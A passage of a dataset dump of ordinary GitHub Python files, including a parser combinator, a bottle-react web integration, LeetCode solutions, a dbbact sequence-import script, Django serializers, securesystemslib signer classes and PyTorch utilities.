That is why the parser\n # starts from the remainder on the status, but remainder is not\n # updated until after the parser succeeds.\n status = self.separator.consume(state, remainder)\n if isinstance(status, Continue):\n status = self.parser.consume(state, status.remainder)\n if isinstance(status, Continue):\n if remainder.position == status.remainder.position:\n raise RecursionError(self, remainder)\n\n remainder = status.remainder\n output.append(status.value)\n else:\n return Continue(remainder, output)\n else:\n return Continue(remainder, output)\n\n def __repr__(self):\n string = f\"rep1sep({self.parser.name_or_repr()}, {self.separator.name_or_repr()})\"\n return self.name_or_nothing() + string\n\n\ndef rep1sep(\n parser: Union[Parser[Input, Output], Sequence[Input]],\n separator: Union[Parser[Input, Any], Sequence[Input]],\n) -> RepeatedOnceSeparatedParser[Input, Output]:\n \"\"\"Match a parser one or more times separated by another parser.\n\n This matches repeated sequences of ``parser`` separated by ``separator``.\n If there is at least one match, a list containing the values of the\n ``parser`` matches is returned. The values from ``separator`` are discarded.\n If it does not match ``parser`` at all, it fails.\n\n Args:\n parser: Parser or literal\n separator: Parser or literal\n \"\"\"\n return RepeatedOnceSeparatedParser(wrap_literal(parser), wrap_literal(separator))\n","repo_name":"drhagen/parsita","sub_path":"src/parsita/parsers/_repeated_seperated.py","file_name":"_repeated_seperated.py","file_ext":"py","file_size_in_byte":6007,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"21"} +{"seq_id":"24682289163","text":"from __future__ import print_function\n\nimport collections, json, os, re, shutil, subprocess\ntry:\n import bottle\n import react.jsx\nexcept ImportError:\n pass # need to not error here for setup.py to get the version\n\n# python3 compat.\ntry:\n basestring\nexcept NameError:\n basestring = str\n\n__version__='0.5.0'\n\n\nFLASK_AROUND = False\ntry:\n import flask\n FLASK_AROUND = True\nexcept ImportError:\n pass\n\n\n\n__ALL__ = ['BottleReact','__version__']\nBABEL_CORE = 'https://cdnjs.cloudflare.com/ajax/libs/babel-core/5.8.24/browser.min.js'\n\nclass BottleReact(object):\n \n def __init__(self, app, prod=False, jsx_path='jsx', asset_path='assets', work_path='/tmp/bottlereact', verbose=None, default_render_html_kwargs=None, harmony=True):\n self.app = app\n self.prod = prod\n self.verbose = not prod if verbose is None else verbose\n self.default_render_html_kwargs = default_render_html_kwargs\n self.jsx_path = jsx_path\n self.hashed_path = os.path.join(work_path, 'hashed-assets')\n self.genned_path = os.path.join(work_path, 'genned-assets')\n self.asset_path = asset_path\n self.harmony = harmony\n self._reqs = collections.defaultdict(list)\n \n if not os.path.isdir(self.jsx_path):\n raise Exception('Directory %s not found - please create it or set the jsx_path parameter.' 
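A usage sketch for the `repsep`/`rep1sep` combinators defined in the parsita record above. The class-based `ParserContext` API is assumed (parsita 2.x; earlier releases spelled it `TextParsers`), so treat the exact imports as version-dependent:

```python
from parsita import ParserContext, lit, reg, repsep

class CsvInts(ParserContext, whitespace=r'[ ]*'):
    integer = reg(r'[0-9]+') > int
    row = repsep(integer, lit(','))   # zero or more ints separated by commas

print(CsvInts.row.parse('1, 2, 3'))   # Success([1, 2, 3])
print(CsvInts.row.parse(''))          # Success([]) because min defaults to 0
```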
% repr(self.jsx_path))\n    \n    if FLASK_AROUND and isinstance(app, flask.app.Flask):\n      if self.prod:\n        @app.route('/__br_assets__/<path:path>')\n        def _serve__br_assets(path):\n          response = flask.send_from_directory(self.hashed_path, path)\n          response.headers[\"Cache-Control\"] = \"public, max-age=31536000\" # one year\n          return response\n      else:\n        @app.route('/__br_assets__/<path:path>')\n        def _serve__br_assets(path):\n          if path=='bottlereact.js':\n            return flask.Response(bottlereact_js, mimetype='text/javascript')\n          elif path.endswith('.jsx'):\n            response = flask.make_response(flask.send_from_directory(self.jsx_path, path))\n            response.headers['Content-Type'] = 'text/babel'\n            return response\n          else:\n            return flask.send_from_directory(self.asset_path, path)\n    else:\n      if self.prod:\n        @app.get('/__br_assets__/<path:path>')\n        def _serve__br_assets(path):\n          response = bottle.static_file(path, root=self.hashed_path)\n          response.set_header(\"Cache-Control\", \"public, max-age=31536000\") # one year\n          return response\n      else:\n        @app.get('/__br_assets__/<path:path>')\n        def _serve__br_assets(path):\n          if path=='bottlereact.js':\n            bottle.response.set_header('Content-Type', 'text/javascript')\n            return bottlereact_js\n          elif path.endswith('.jsx'):\n            bottle.response.set_header('Content-Type', 'text/babel')\n            return bottle.static_file(path, root=self.jsx_path)\n          else:\n            return bottle.static_file(path, root=self.asset_path)\n\n\n    # load all JSX files\n    classes_by_file = collections.defaultdict(list)\n    for fn in sorted(os.listdir(self.jsx_path)):\n      if not fn.endswith('.jsx'): continue\n      with open(os.path.join(self.jsx_path, fn), 'r') as f:\n        for line in f.readlines():\n          if 'React.createClass' in line:\n            if '=' not in line: continue\n            react_class = line.split('=')[0].strip().split()[-1]\n            classes_by_file[fn].append(react_class)\n            self.__dict__[react_class] = _ReactClass(react_class, fn)\n          if 'extends React.Component' in line:\n            if 'class' not in line: continue\n            react_class = line[line.find('class')+5:line.find('extends')].strip()\n            classes_by_file[fn].append(react_class)\n            self.__dict__[react_class] = _ReactClass(react_class, fn)\n          if line.startswith('// require '):\n            req = line[len('// require '):].strip()\n            self._reqs[fn].append(req)\n\n    if self.verbose:\n      print('BR classes by file:', dict(classes_by_file.items()))\n\n    self._fn2hash = {}\n    if prod:\n      transformer = react.jsx.JSXTransformer()\n      \n      # confirm tmp paths exist\n      for path in [self.hashed_path, self.genned_path]:\n        if not os.path.isdir(path):\n          os.makedirs(path)\n\n      # unfiltered assets\n      self._fn2hash = self._load_fn_to_hash_mapping(self.asset_path, '*', dest=self.hashed_path)\n\n      # jsx assets\n      jsx2hash = self._load_fn_to_hash_mapping(self.jsx_path, '*.jsx', dest=self.genned_path)\n      for jsx_fn, jsx_hashed_fn in jsx2hash.items():\n        jsx_converted_fn = os.path.join(self.genned_path, jsx_hashed_fn[:-1])\n        if not os.path.exists(jsx_converted_fn) or os.stat(jsx_converted_fn).st_size==0:\n          transformer.transform(os.path.join(self.genned_path, jsx_hashed_fn), js_path=jsx_converted_fn, harmony=self.harmony)\n\n      # bottlereact.js\n      with open(os.path.join(self.genned_path, 'bottlereact.js'),'w') as f:\n        f.write(bottlereact_js)\n        f.write('\\nbottlereact._assets = ')\n        json.dump(self._fn2hash, f)\n        f.write(';\\n')\n\n      # add the jsx files (which are only used server side, so not written to 'bottlereact.js')\n      jsxjs2hash = self._load_fn_to_hash_mapping(self.genned_path, '*.js', dest=self.hashed_path)\n      for k,v in jsx2hash.items():\n        self._fn2hash[k] = jsxjs2hash[v[:-1]]\n\n      # get the hashed name of 'bottlereact.js'\n      
self._fn2hash['bottlereact.js'] = jsxjs2hash['bottlereact.js']\n\n      if self.verbose: print('BR file hashes:', self._fn2hash)\n\n    if self.verbose: print('BR file requirements: ', dict(self._reqs.items()))\n\n\n  def _build_dep_list(self, files):\n    files = set(files)\n    deps = collections.OrderedDict()\n    while len(files):\n      fn = files.pop()\n      if fn not in deps:\n        deps[fn] = True\n        for fn2 in self._reqs[fn]:\n          files.add(fn2)\n    deps['bottlereact.js'] = True\n    if not self.prod:\n      deps[BABEL_CORE] = True\n    return list(reversed(deps.keys()))\n\n  def get_asset_path(self, fn):\n    return '/__br_assets__/%s' % self._fn2hash.get(fn, fn)\n\n  def _load_fn_to_hash_mapping(self, path, selector, dest=None):\n    path = os.path.abspath(path)\n    ret = {}\n    if not os.path.isdir(path): return ret\n    if not os.listdir(path): return ret\n    output = subprocess.check_output(['find %s -name \\'%s\\' -type f -print0 | xargs -0 -n 100 sha256sum' % (path, selector)], shell=True)\n    for line in output.decode(\"utf8\").split('\\n'):\n      line = line.strip()\n      if not line: continue\n      hsh, fn = line.split(' ', 1)\n      hsh = hsh[:16]\n      base_fn = os.path.relpath(fn, path)\n      hashed_fn = '%s-%s' % (hsh, base_fn.replace('/','__'))\n      ret[base_fn] = hashed_fn\n      tmp_fn = os.path.join(dest, hashed_fn)\n      if not os.path.exists(tmp_fn):\n        shutil.copy(fn, tmp_fn)\n        if self.verbose: print('BR copied', fn, 'to', tmp_fn)\n    return ret\n  \n  def calc_render_html_kwargs(self, kwargs):\n    if self.default_render_html_kwargs is None:\n      return kwargs\n    if hasattr(self.default_render_html_kwargs, '__call__'):\n      ret = self.default_render_html_kwargs()\n    else:\n      ret = dict(self.default_render_html_kwargs.items())\n    ret.update(kwargs)\n    return ret\n\n  def render_html(self, react_node, **kwargs):\n    kwargs = self.calc_render_html_kwargs(kwargs)\n    template = kwargs.get('template', 'bottlereact')\n    react_js = react_node.to_javascript()\n    deps = self._build_dep_list(react_node.get_js_files())\n    classes = _make_json_string_browser_safe(json.dumps(list(react_node.get_react_classes())))\n    deps_html = ['']\n    for dep in deps:\n      path = dep if dep.startswith('http://') or dep.startswith('https://') else self.get_asset_path(dep)\n      if path.endswith('.css'):\n        deps_html.append('<link rel=\"stylesheet\" href=\"%s\">' % bottle.html_escape(path))\n      elif path.endswith('.js'):\n        deps_html.append('<script src=\"%s\"></script>' % bottle.html_escape(path))\n      elif path.endswith('.jsx'):\n        deps_html.append('<script type=\"text/babel\" src=\"%s\"></script>' % bottle.html_escape(path))\n      else: # assume javascript\n        deps_html.append('<script src=\"%s\"></script>' % bottle.html_escape(path))\n    deps_html = '\\n'.join(deps_html)\n    init = '''\n      <script>\n        bottlereact._onLoad(%s, function() {\n          ReactDOM.render(\n            %s,\n            document.body\n          );\n        });\n      </script>\n    ''' % (classes, react_js)\n    if 'title' not in kwargs: kwargs['title'] = 'bottle-react - https://github.com/keredson/bottle-react'\n    kwargs.update({\n      'deps': deps_html,\n      'init': init,\n      'prod': self.prod,\n      'asset_path': self.get_asset_path,\n    })\n    return bottle.template(template, **kwargs)\n\n\ndef _make_json_string_browser_safe(s):\n  return s.replace('<', '\\\\u003c')\n\n\nclass _ReactNode(object):\n  def __init__(self, react_class, props=None, children=None):\n    self.react_class = react_class\n    self.props = react_class.default_props() if props is None else props\n    self.children = children if children is not None else []\n  def get_js_files(self):\n    files = set([self.react_class.fn])\n    for child in self.children:\n      files |= child.get_js_files()\n    return files\n  def get_react_classes(self):\n    classes = set([self.react_class.name])\n    for child in self.children:\n      classes |= child.get_react_classes()\n    return classes\n  def to_javascript(self):\n    ret = ['bottlereact.', self.react_class.name, '(', _make_json_string_browser_safe(json.dumps(self.props)), ', [']\n    count = len(ret)\n    for child in self.children:\n      ret.append(child.to_javascript())\n      ret.append(',')\n    if len(ret) > count: del ret[-1] # delete the last comma\n    ret.append(']')\n    ret.append(')')\n    return ''.join(ret)\n\n\nclass _ReactClass(object):\n  def __init__(self, name, fn):\n    if not re.match(\"^[A-Za-z][_a-zA-Z0-9]*$\", name):\n      raise Exception('%s is not a valid javascript identifier' % name)\n    self.name = name\n    self.fn = fn\n    self.default_props = dict\n    try:\n      import jsx_props\n      self.default_props = jsx_props.__dict__.get('init%s'%name, dict)\n    except ImportError:\n      pass\n  def __call__(self, props=None, children=None):\n    '''\n      props must be a dict or None\n      children must be a list of ReactNode objects, or None\n    '''\n    return _ReactNode(self, 
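`_load_fn_to_hash_mapping` above shells out to `sha256sum` and keeps a 16-hex-character digest prefix as the cache-busting file name, which is what makes the one-year `Cache-Control` header safe to send. A pure-Python hashlib equivalent of that naming scheme; the function name and example path are mine:

```python
import hashlib
import os

def hashed_name(root, rel_path):
    # 16-hex-char content digest + flattened relative path, mirroring
    # '%s-%s' % (hsh, base_fn.replace('/', '__')) in the record above
    with open(os.path.join(root, rel_path), 'rb') as f:
        digest = hashlib.sha256(f.read()).hexdigest()[:16]
    return '%s-%s' % (digest, rel_path.replace('/', '__'))

# hashed_name('assets', 'css/site.css') -> e.g. '3a7bd3e2360a3d29-css__site.css'
```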
props, children)\n\n\n\nbottlereact_js = '''\nvar pending_deps = [];\nvar checkDeps = function() {\n  for (var i=0; i int:\n        li = list(map(int, str(num)))\n        index = {x:i for i,x in enumerate(li)}\n        for i,x in enumerate(li):\n            for y in reversed(range(10)):\n                if y in index and index[y]>i and y>x:\n                    li[i],li[index[y]] = li[index[y]],li[i]\n                    return int(''.join(map(str,li)))\n        return num\nclass Solution2:\n    def maximumSwap(self, num: int) -> int:\n        li = list(str(num))\n        temp = li[:]\n        i=0\n        while temp:\n            maxx = max(temp)\n            if maxx!=li[i]:\n                break\n            temp.remove(maxx)\n            i+=1\n        if not temp: return num\n        idx=li[::-1].index(maxx) # get the last max if multiple. that's why reversed\n        idx = len(li)-1-idx\n        li[i],li[idx]=li[idx],li[i]\n        li = ''.join(li)\n        li = int(li)\n        return li\nclass Solution3:\n    def maximumSwap(self, num: int) -> int:\n        li=[int(c) for c in str(num)]\n        n=len(li)\n\n        leftMin=[[float('inf'),-1]]*n\n        minn=float('inf')\n        for i in range(n):\n            if li[i]<minn:\n                minn=li[i]\n                leftMin[i]=[minn,i]\n            else:\n                leftMin[i]=leftMin[i-1]\n        rightMax=[[-1,-1]]*n\n        maxx=-1\n        for i in reversed(range(n)):\n            if li[i]>maxx:\n                maxx=li[i]\n                rightMax[i]=[maxx,i]\n            else:\n                rightMax[i]=rightMax[i+1]\n        i=0\n        while i<n and li[i]>=rightMax[i][0]:\n            i+=1\n        if i==len(li): return num\n        leftIdx=leftMin[i][1]\n        rightIdx=rightMax[i][1]\n        li[leftIdx],li[rightIdx]=li[rightIdx],li[leftIdx]\n        return int(''.join(map(str,li)))\nclass tester(unittest.TestCase):\n    def test01(self):\n        self.assertEqual(0, get_sol().maximumSwap(0))\n    def test02(self):\n        self.assertEqual(1, get_sol().maximumSwap(1))\n    def test03(self):\n        self.assertEqual(98, get_sol().maximumSwap(98))\n    def test04(self):\n        self.assertEqual(98, get_sol().maximumSwap(89))\n    def test05(self):\n        self.assertEqual(88, get_sol().maximumSwap(88))\n    def test06(self):\n        self.assertEqual(7236, get_sol().maximumSwap(2736))\n    def test07(self):\n        self.assertEqual(9973, get_sol().maximumSwap(9973))\n    def test08(self):\n        self.assertEqual(999, get_sol().maximumSwap(999))\n    def test09(self):\n        self.assertEqual(98863, get_sol().maximumSwap(98368))\n    def test10(self):\n        self.assertEqual(511, get_sol().maximumSwap(115))\n    def test11(self):\n        self.assertEqual(90909011, get_sol().maximumSwap(10909091))\n    def test12(self):\n        self.assertEqual(99910, get_sol().maximumSwap(99901))\n    def test13(self):\n        self.assertEqual(63454, get_sol().maximumSwap(43456))\n","repo_name":"afzalsiddique/problem-solving","sub_path":"Problem_Solving_Python/leetcode/lc670.py","file_name":"lc670.py","file_ext":"py","file_size_in_byte":3439,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"10699026254","text":"#!/usr/bin/env python\n\n# Put all dbBact sequences into the sequence translator update queue\n# need to run after adding a new whole seq database / region\n\n'''Put all dbBact sequences into the sequence translator update queue\nneed to run after adding a new whole seq database / region\n'''\n\nimport sys\nimport requests\n\nimport argparse\nimport setproctitle\n\nfrom dbbact_server import db_access\nfrom dbbact_server.utils import debug, SetDebugLevel\n\n__version__ = \"0.9\"\n\n\ndef add_seq_counts(con, cur, seq_trans_addr='http://127.0.0.1:5021'):\n\tdebug(3, 'import_all_seqs started')\n\tdebug(2, 'processing sequences')\n\tcur.execute('SELECT id, sequence FROM SequencesTable')\n\tseq_info = {}\n\tfor cres in cur:\n\t\tcid = cres['id']\n\t\tcseq = cres['sequence']\n\t\tseq_info[cid] = cseq\n\tdebug(2, 'found %d sequences' % len(seq_info))\n\tdebug(2, 'adding to newsequencestable using rest-api')\n\tres = requests.post(seq_trans_addr + '/add_sequences_to_queue', json={'seq_info': seq_info})\n\tif 
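The lc670 record above collects three takes on LeetCode 670 (maximum swap). A compact variant of the same last-occurrence idea, checked against two of the record's own test cases:

```python
def maximum_swap(num: int) -> int:
    digits = list(str(num))
    last = {int(d): i for i, d in enumerate(digits)}  # digit -> last index
    for i, d in enumerate(digits):
        for bigger in range(9, int(d), -1):
            if last.get(bigger, -1) > i:
                j = last[bigger]
                digits[i], digits[j] = digits[j], digits[i]
                return int(''.join(digits))
    return num

assert maximum_swap(2736) == 7236
assert maximum_swap(98368) == 98863
```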
res.status_code != 200:\n\t\tdebug(5, 'failed! %s' % res.content)\n\tdebug(3, 'done')\n\n\ndef main(argv):\n\tparser = argparse.ArgumentParser(description='import all sequences from dbbact into sequence_translator. version ' + __version__)\n\tparser.add_argument('--port', help='postgres port', default=5432, type=int)\n\tparser.add_argument('--host', help='postgres host', default=None)\n\tparser.add_argument('--database', help='postgres database', default='dbbact')\n\tparser.add_argument('--user', help='postgres user', default='dbbact')\n\tparser.add_argument('--password', help='postgres password', default='magNiv')\n\tparser.add_argument('--proc-title', help='name of the process (to view in ps aux)')\n\tparser.add_argument('--debug-level', help='debug level (1 for debug ... 9 for critical)', default=2, type=int)\n\tparser.add_argument('--seq-trans-addr', help='sequence translator rest-api address', default='http://127.0.0.1:5021')\n\targs = parser.parse_args(argv)\n\n\tSetDebugLevel(args.debug_level)\n\t# set the process name for ps aux\n\tif args.proc_title:\n\t\tsetproctitle.setproctitle(args.proc_title)\n\n\tcon, cur = db_access.connect_db(database=args.database, user=args.user, password=args.password, port=args.port, host=args.host)\n\tadd_seq_counts(con, cur, seq_trans_addr=args.seq_trans_addr)\n\n\nif __name__ == \"__main__\":\n\tmain(sys.argv[1:])\n","repo_name":"amnona/dbbact-sequence-translator","sub_path":"scripts/import_all_seqs.py","file_name":"import_all_seqs.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1347114651","text":"#!/usr/bin/env python3\n\nwith open('../input.txt') as f:\n content = f.readlines()\n\ndef location_within_region(x, y, points):\n LIMIT = 10_000\n return sum([dist(x, y, p_x, p_y) for p_x, p_y in points.values()]) < LIMIT\n\ndef dist(x_1, y_1, x_2, y_2):\n return abs(x_1 - x_2) + abs(y_1 - y_2)\n\nGRID_WIDTH = 500\nGRID_HEIGHT = 500\n\npoints = {(i + 1): tuple(int(x) for x in line.split(',')) for i, line in enumerate(content)}\n\narea_tally = 0\n\nfor x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n if (location_within_region(x, y, points)):\n area_tally += 1\n\nprint(area_tally)\n","repo_name":"jpcornwell/advent-of-code","sub_path":"4-2018/06-Day/py/2-part.py","file_name":"2-part.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18612680590","text":"from rest_framework import serializers\nfrom rest_framework.validators import UniqueTogetherValidator\n\nfrom .models import Products, ProductsCategory\n\n\nclass CategorySerializers(serializers.ModelSerializer):\n class Meta:\n model = ProductsCategory\n\n fields = ['id', 'name']\n extra_kwargs = {'name': {'required': True}}\n\n\nclass ProductsSerializers(serializers.ModelSerializer):\n class Meta:\n model = Products\n category = CategorySerializers(read_only=True)\n include_fk = True\n fields = ['id', 'category', 'name', 'count']\n extra_kwargs = {\n 'category': {'required': True},\n 'name': {'required': True},\n 'count': {'required': True}\n }\n\nclass SaleSerializer(serializers.ModelSerializer):\n class Meta:\n model = Products\n fields = ['id', 'count']\n\n def update(self, instance, validated_data):\n count = validated_data.get('count')\n prod = super(SaleSerializer, self).update(instance, validated_data)\n if count:\n prod.set_count(validated_data.get('count'))\n prod.save()\n return 
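The advent-of-code day-6 record above scans a 500x500 grid cell by cell, summing Manhattan distances from each cell to every point. The same count vectorizes with numpy broadcasting; the toy points and LIMIT below are mine (the record uses 10_000 on a 500x500 grid):

```python
import numpy as np

points = np.array([[1, 1], [3, 4], [7, 2]])
LIMIT, W, H = 32, 10, 10

xs, ys = np.meshgrid(np.arange(W), np.arange(H), indexing='ij')
grid = np.stack([xs, ys], axis=-1)                          # (W, H, 2)
dists = np.abs(grid[:, :, None, :] - points).sum(axis=-1)   # (W, H, n_points)
print(int((dists.sum(axis=-1) < LIMIT).sum()))              # region size
```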
prod\n","repo_name":"Nigar-mr/Rest-Api-Task","sub_path":"app/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33131568228","text":"\"\"\"Signer interface and the default implementations\"\"\"\n\nimport logging\nimport os\nfrom abc import ABCMeta, abstractmethod\nfrom typing import Callable, Dict, Optional, Type\nfrom urllib import parse\n\nimport securesystemslib.keys as sslib_keys\nfrom securesystemslib.signer._key import Key, SSlibKey\nfrom securesystemslib.signer._signature import Signature\n\nlogger = logging.getLogger(__name__)\n\n# NOTE Signer dispatch table is defined here so it's usable by Signer,\n# but is populated in __init__.py (and can be appended by users).\nSIGNER_FOR_URI_SCHEME: Dict[str, Type] = {}\n\n\n# SecretsHandler is a function the calling code can provide to Signer:\n# SecretsHandler will be called if Signer needs additional secrets.\n# The argument is the name of the secret (\"PIN\", \"passphrase\", etc).\n# Return value is the secret string.\nSecretsHandler = Callable[[str], str]\n\n\nclass Signer(metaclass=ABCMeta):\n \"\"\"Signer interface that supports multiple signing implementations.\n\n Usage example:\n\n signer = Signer.from_priv_key_uri(\"envvar:MYPRIVKEY\", pub_key)\n sig = signer.sign(b\"data\")\n\n Note that signer implementations may raise errors (during both\n Signer.from_priv_key_uri() and Signer.sign()) that are not documented here:\n examples could include network errors or file read errors. Applications\n should use generic try-except here if unexpected raises are not an option.\n\n See SIGNER_FOR_URI_SCHEME for supported private key URI schemes. The\n currently supported default schemes are:\n * envvar: see SSlibSigner for details\n * file: see SSlibSigner for details\n\n Interactive applications may also define a secrets handler that allows\n asking for user secrets if they are needed:\n\n from getpass import getpass\n\n def sec_handler(secret_name:str) -> str:\n return getpass(f\"Enter {secret_name}: \")\n\n # user will not be asked for a passphrase for unencrypted key\n uri = \"file:keys/mykey?encrypted=false\"\n signer = Signer.from_priv_key_uri(uri, pub_key, sec_handler)\n\n # user will be asked for a passphrase for encrypted key\n uri2 = \"file:keys/myenckey?encrypted=true\"\n signer2 = Signer.from_priv_key_uri(uri2, pub_key2, sec_handler)\n\n Applications can provide their own Signer and Key implementations:\n\n from securesystemslib.signer import Signer, SIGNER_FOR_URI_SCHEME\n from mylib import MySigner\n\n SIGNER_FOR_URI_SCHEME[MySigner.MY_SCHEME] = MySigner\n\n This way the application code using signer API continues to work with\n default signers but now also uses the custom signer when the proper URI is\n used.\n \"\"\"\n\n @abstractmethod\n def sign(self, payload: bytes) -> Signature:\n \"\"\"Signs a given payload by the key assigned to the Signer instance.\n\n Arguments:\n payload: The bytes to be signed.\n\n Returns:\n Returns a \"Signature\" class instance.\n \"\"\"\n raise NotImplementedError # pragma: no cover\n\n @classmethod\n @abstractmethod\n def from_priv_key_uri(\n cls,\n priv_key_uri: str,\n public_key: Key,\n secrets_handler: Optional[SecretsHandler] = None,\n ) -> \"Signer\":\n \"\"\"Factory constructor for a given private key URI\n\n Returns a specific Signer instance based on the private key URI and the\n supported uri schemes listed in SIGNER_FOR_URI_SCHEME.\n\n Args:\n 
priv_key_uri: URI that identifies the private key\n public_key: Key that is the public portion of this private key\n secrets_handler: Optional function that may be called if the\n signer needs additional secrets (like a PIN or passphrase).\n secrets_handler should return the requested secret string.\n\n Raises:\n ValueError: Incorrect arguments\n Other Signer-specific errors: These could include OSErrors for\n reading files or network errors for connecting to a KMS.\n \"\"\"\n\n scheme, _, _ = priv_key_uri.partition(\":\")\n if scheme not in SIGNER_FOR_URI_SCHEME:\n raise ValueError(f\"Unsupported private key scheme {scheme}\")\n\n signer = SIGNER_FOR_URI_SCHEME[scheme]\n return signer.from_priv_key_uri(\n priv_key_uri, public_key, secrets_handler\n )\n\n\nclass SSlibSigner(Signer):\n \"\"\"A securesystemslib signer implementation.\n\n Provides a sign method to generate a cryptographic signature with a\n securesystemslib-style rsa, ed25519 or ecdsa key. See keys module\n for the supported types, schemes and hash algorithms.\n\n SSlibSigners should be instantiated with Signer.from_priv_key_uri().\n These private key URI schemes are supported:\n * \"envvar:\":\n VAR is an environment variable with unencrypted private key content.\n envvar:MYPRIVKEY\n * \"file:?encrypted=[true|false]\":\n PATH is a file path to a file with private key content. If\n encrypted=true, the file is expected to have been created with\n securesystemslib.keys.encrypt_key().\n file:path/to/file?encrypted=true\n file:/abs/path/to/file?encrypted=false\n\n Attributes:\n key_dict:\n A securesystemslib-style key dictionary. This is an implementation\n detail, not part of public API\n \"\"\"\n\n ENVVAR_URI_SCHEME = \"envvar\"\n FILE_URI_SCHEME = \"file\"\n\n def __init__(self, key_dict: Dict):\n self.key_dict = key_dict\n\n @classmethod\n def from_priv_key_uri(\n cls,\n priv_key_uri: str,\n public_key: Key,\n secrets_handler: Optional[SecretsHandler] = None,\n ) -> \"SSlibSigner\":\n \"\"\"Constructor for Signer to call\n\n Please refer to Signer.from_priv_key_uri() documentation.\n\n Additionally raises:\n OSError: Reading the file failed with \"file:\" URI\n \"\"\"\n if not isinstance(public_key, SSlibKey):\n raise ValueError(f\"Expected SSlibKey for {priv_key_uri}\")\n\n uri = parse.urlparse(priv_key_uri)\n\n if uri.scheme == cls.ENVVAR_URI_SCHEME:\n # read private key from environment variable\n private = os.getenv(uri.path)\n if private is None:\n raise ValueError(f\"Unset env var for {priv_key_uri}\")\n\n elif uri.scheme == cls.FILE_URI_SCHEME:\n params = dict(parse.parse_qsl(uri.query))\n if \"encrypted\" not in params:\n raise ValueError(f\"{uri.scheme} requires 'encrypted' parameter\")\n\n # read private key (may be encrypted or not) from file\n with open(uri.path, \"rb\") as f:\n private = f.read().decode()\n\n if params[\"encrypted\"] != \"false\":\n if not secrets_handler:\n raise ValueError(\"encrypted key requires a secrets handler\")\n\n secret = secrets_handler(\"passphrase\")\n decrypted = sslib_keys.decrypt_key(private, secret)\n private = decrypted[\"keyval\"][\"private\"]\n\n else:\n raise ValueError(f\"SSlibSigner does not support {priv_key_uri}\")\n\n keydict = public_key.to_securesystemslib_key()\n keydict[\"keyval\"][\"private\"] = private\n return cls(keydict)\n\n def sign(self, payload: bytes) -> Signature:\n \"\"\"Signs a given payload by the key assigned to the SSlibSigner instance.\n\n Please see Signer.sign() documentation.\n\n Additionally raises:\n securesystemslib.exceptions.FormatError: Key 
argument is malformed.\n            securesystemslib.exceptions.CryptoError, \\\n                securesystemslib.exceptions.UnsupportedAlgorithmError:\n                Signing errors.\n        \"\"\"\n        sig_dict = sslib_keys.create_signature(self.key_dict, payload)\n        return Signature(**sig_dict)\n","repo_name":"Junochiu/securesystemslib","sub_path":"securesystemslib/signer/_signer.py","file_name":"_signer.py","file_ext":"py","file_size_in_byte":7824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"}
{"seq_id":"13588083472","text":"import torch\nimport numpy as np\nfrom typing import List\nfrom math import floor\n\n\ndef split_int_into_n(i: int, n: int) -> List[int]:\n    \"\"\"Divides an integer i into n slots, where i is distributed as equally\n    as possible across each slot.\n\n    Args:\n        i (int): number to be divided.\n        n (int): number of slots.\n\n    Returns:\n        List[int]: list of numbers which sum to i.\n    \"\"\"\n    r = i % n\n    o = [floor(i / n) for _ in range(n)]\n    idx = 0\n    while r > 0:\n        o[idx] += 1\n        r -= 1\n        idx += 1\n    return o\n\n\ndef crop_to_size(X: torch.Tensor, output_size: list) -> torch.Tensor:\n    \"\"\"Crops a tensor to the size given by list. Assumes the first two\n    dimensions are the batch and channel dimensions.\n\n    Args:\n        X (torch.Tensor): torch Tensor to be cropped\n        output_size (list): list with the output dimensions. Should be\n            smaller or identical to the current dimensions and the list length\n            should be len(X.shape)\n\n    Returns:\n        torch.Tensor: a resized torch Tensor\n    \"\"\"\n    sh = list(X.shape)[2:]\n    diff = [i - j for i, j in zip(sh, output_size)]\n    a = [x // 2 for x in diff]\n    r = [i - j for i, j in zip(diff, a)]\n    b = [i - j for i, j in zip(sh, r)]\n    for i, (x, y) in enumerate(zip(a, b)):\n        idx = torch.LongTensor(np.r_[x:y]).to(X.device)\n        X = torch.index_select(X, i + 2, idx)\n    return X\n\n\ndef unsqueeze_to_target(x: torch.Tensor, target: torch.Tensor, dim=-1):\n    cur, tar = len(x.shape), len(target.shape)\n    if cur < tar:\n        for _ in range(tar - cur):\n            x = x.unsqueeze(dim)\n    return x\n\n\nclass SequentialWithArgs(torch.nn.Sequential):\n    \"\"\"\n    Modified Sequential module. The difference is that the forward takes\n    arguments.\n    \"\"\"\n\n    def __init__(self, *args: torch.nn.Module):\n        \"\"\"\n        Args:\n            modules (torch.nn.Module): module\n        \"\"\"\n        super().__init__(*args)\n\n    def forward(self, X: torch.Tensor, *args, **kwargs) -> torch.Tensor:\n        for module in self:\n            X = module(X, *args, **kwargs)\n        return X\n","repo_name":"CCIG-Champalimaud/adell-mri","sub_path":"lib/modules/layers/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"}
{"seq_id":"23952024014","text":"# Importing Libraries\r\nimport numpy as np # LIBRARY IMPORT FOR LINEAR ALGEBRA\r\nimport pandas as pd # LIBRARY IMPORT FOR DATA PROCESSING\r\nfrom sklearn.model_selection import train_test_split # MODULE IMPORT FOR DATA SPLITTING\r\n\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.preprocessing import MinMaxScaler\r\n\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\nfrom tensorflow.keras import layers,Sequential\r\nfrom tensorflow.keras.layers import Dense,LSTM, Dropout\r\n\r\n# YOUR IMPLEMENTATION\r\n# Thoroughly comment your code to make it easy to follow\r\n\r\nif __name__ == "__main__": \r\n    # 1. 
